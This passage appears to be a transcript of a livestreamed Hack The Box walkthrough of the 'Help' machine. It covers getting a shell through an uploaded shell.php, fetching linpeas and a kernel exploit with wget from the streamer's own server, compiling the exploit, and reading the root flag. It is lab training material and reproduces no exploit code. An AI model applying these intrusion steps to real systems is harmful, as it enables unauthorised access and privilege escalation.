as an admin? That's the only thing I did differently. Well, I should be able to just navigate to this. If I just do a copy selection. Oh, we got a shell. Look at that. We are help. Alright, perfect. We got initial access on the box, finally, after all this time. Let's stabilize our shell here. And we will do change directory home cat user.txt. Dang, that was a hard user flag. I don't know why that was so hard. That was, to me, a medium. To me, it was a medium. That required several steps and a lot of pain and agony. Let's go ahead and play a machine. We only got a half hour left. Let's upload our user flag. Got the user flag here. Submit the root flag. We gotta figure out how to get to root. So help seems interesting. So what is help? Change directory help. Is this a binary, a directory? This. Well, let's do sudo-l. Password for help. I don't know the password for help. We could know. We would know the password if we did the other exploit. Let's continue with guided mode. We have to because we're running out of time, guys. I'd rather not. I'd rather try to figure this out, but we've used up all our time trying to get initial access. What's the username that we get to show us and help? Help. What is the kernel version? Submit the flag. What's the kernel version on help? Oh, we just, okay, that's a huge hint. So if we just look at the kernel version. Let's just, alright, so if I didn't look at that, I mean, we would know to, let's just change directory /tmp and we will upload linps. Let's upload linps. Hopefully that didn't kill my shell. Perfect. It didn't. Alright. Change directory /tools. Change directory tools. Oh my god. Change directory tools. Systemctl stop Apache 2. And then we will do Python 3-m http.server 80. And we'll come over here and we will do a wget http:// my IP address 10.10.16.25/linps.sh. Perfect. It should be a linps, so we will smod +x linps. And then we will launch linps, and there's our best friend. Oh, linpeas.sh. There's no space there. There's our best friend Linpeas. Look at him. Look how cute he is. Yeah, cheaters will ruin online games. It really sucks. There was a point in time where cheaters wasn't really a thing in online gaming. Like, it was a problem, and then it became like they solved the problem, but then it became a problem again, unfortunately. And when I say it was a problem, like, I'm talking like early 2000s, like some of the first online games ever had a lot of cheating, right? The first online games ever had a lot of cheating. And then when we went to the next generation of online gaming, so I'm talking about like the Call of Duty 4 to like the Call of Duty Black Ops 2 era, you know what I mean? Not that many cheaters. Even Black Ops 3, I really didn't start seeing cheaters until the Modern Warfare reboot. And when that came out, 2019, I think it's when it came out. Maybe 2020. I can't remember when that game came out. But the Modern Warfare, when Warzone came out, when Warzone came out, cheaters galore, and it ruined online gaming forever, in my opinion. And every game has cheaters nowadays. I mean, Escape from Tarkov. I didn't know Rainbow Six had cheating problems. So this is our Linux version. So we got to figure out how to do this kernel exploit here. Local pros escalation. Is there GCC on this box? I gotta wait for Limpies to run, because if I hit Control C, it's gonna kill my shell. So I don't want to do Control C because I don't want to kill my shell. So we'll let this finish here, and we will. But this looks like it's going to be the exploit right here. Oh, it's just Limpies would just get done so I can work. I figured out the exploit. I shouldn't have ran this. I should have just did a command to give it to me rather than running all of Limpies. I didn't need all of Limpies. I just needed the kernel exploit because I knew it was going to be kernel exploit due to the guided mode kind of telling me. This is taking so long. What's up, Justin? Welcome to the stream. Thanks for stopping in. Glad to see you here. How you doing today? You're just joining in. The part I'm on privilege escalation now, so I got the user flag, and I'm trying to elevate from user to root at the moment. I'm waiting for Limpy to finish here, so I can try this kernel exploit. And once I'm pretty sure this kernel exploit is going to work. And when it does, I'll have root exploit hopefully soon. But I need this Limpy's output. I could have honestly canceled this and got my reverse shell again. Sorry, I mean my initial access shell again. But it took me so long to get initial access that I did not want to try to exploit it again, just in case it doesn't work for me again. Because yeah, I don't want to give up this shell access. And if I hit Control C to cancel this Limpy's script, it's going to quit the shell. So we're going to avoid that and just wait, even though I don't need any of this output anymore. It's like I got the kernel exploit ready to go. Well, nearly ready to go. Did you make the CCM security course? No, I did not. Dude, this is the longest Limpy's ever. Like, I've never seen Limpy's take so long in my life. Honestly, I'm almost wanting to just try to exploit this again. It's just doing that. I could have done this a long time ago. I don't know why I didn't do this. I'm sitting here waiting for nothing. We can do, all I have to do is this up arrow key here, and that should give us a shell, maybe. Maybe. Also upload shell.php again. fbkw2. Submit. Cross-site request forwarder detected. Please try again. What the heck? My tickets. I want to submit a ticket. How do I submit a ticket? Here we go. Submit a ticket. Next. Q3v1j. Shell.php. Files not allowed. That's perfect because file not allowed. It still works. See, even though file is not allowed, file still works. So error messages aren't always factual, guys. That's a big lesson there. Alright. Is GCC on this machine? Compilation terminated. Alright. Cool. We just need to grab this exploit now. Where's it at? this kernel exploit right here. So we will copy this. There's no compiling instructions, so we're just gonna do the generic one. So we'll do change directory / temp, and we will do nano exploit.c, and then we will paste this. Control X, Y. No, why can't I? Gross. Lost my shell. Let's try it again. Trigger it one more time. That should work. I thought I stabilized the shell. I guess I didn't. Did I not stabilize the shell? Apparently not. Limpy's is still running. It's taking forever. There we go. Got our shell again. I thought I stabilized it. Maybe I didn't stabilize it fully. And that's where I messed up. Nano exploit.c. Paste this. Nope. That's not what I want to paste. I want to paste this code here into here. Control X. Why can't I leave this? What's going on here, bro? I guess I'm not allowed to use nano in that shell. That's really weird to me, even after I stabilize it. So that's okay. We will just do this. Change directory to hack the box. No. Hack the box / help nano exploit.c, and we will do a Python server, and we're just going to transfer the file. We don't need to write it. We don't need to use nano here. And we got 2 shells, so we're about to get 2 shells because this is working pretty good. Let's do wget http ://10.10.16.25 / exploit.c. We got exploit.c, so if we do a cat exploit.c, we got the file there. So if we do gcc, man, I forgot how to do gcc. It's like gcc how to compile exploit.c with gcc on Linux. Terminal. All right, it's just -o. Yeah. So we will paste this. So it's gcc -o exploit c, and then if we do an ls, exploit's working. So if we do a /exploit, look, we're root. Who am I? We are root. ID. We are root and root. Look at that. Now we can do cat /root/root.txt. Got it. And we will paste our root flag into here. The flag difficulty for the entry was medium, in my opinion, and the root flag was easy. The root flag took us no time at all. I think root was a piece of cake, honestly. And there we go. That is help. Unfortunately, we don't have time to do anything else. I'd like to get 2 or 3 boxes per stream, but we spent 3 hours and 43 minutes on 1 box, which is a little longer than I average. So this was a little bit harder in my opinion, and people tend to agree with me here because look, it's a lot of medium. It's a medium bar. This could have been classified as a medium, straight up. This was not an easy box. I mean, it's classified as an easy, but I think it's misclassified. This should probably be a medium box. And a medium box in 3.5 hours, it's pretty good timing in my opinion. Normally I can do 2 or 3 easy boxes if they're like genuinely easy. This one was not too easy. And like I said, the community voted this should be medium as well. I'm not the only one that thinks that. So, not too mad about the fact that it took me 3 hours and 45 minutes to do this box, even though it was an easy box. Had fun, learned a lot, and that is all that matters. And that's what's important. Anyways, guys, thank you so much for watching. Thanks for hanging out. If you haven't followed the channel already, follow the channel. Subscribe if you haven't already. I'm on YouTube, Twitch, and Kick. I also stream on LinkedIn. I also make YouTube videos. I upload a video every day, but my main videos come out on Fridays. I stream on Thursdays and Fridays. Sorry, Thursdays and Sundays. Thursdays and Sundays. So the next stream will be Sunday at noon Eastern Time, and that is 9 a.m. Pacific Time. Hopefully I see you on the next stream. And if you haven't checked out my podcast, check out my podcast. It's called The Hacker's Cache. It's on all the podcast apps and on YouTube. So if you haven't checked out that podcast, I put a lot of work into it. I really appreciate if you checked it out. And yeah, hopefully I see you around in the next stream. Thanks for watching. Thanks for hanging out. Once again, you guys are awesome. Thanks for the support. This is Kyser, signing off.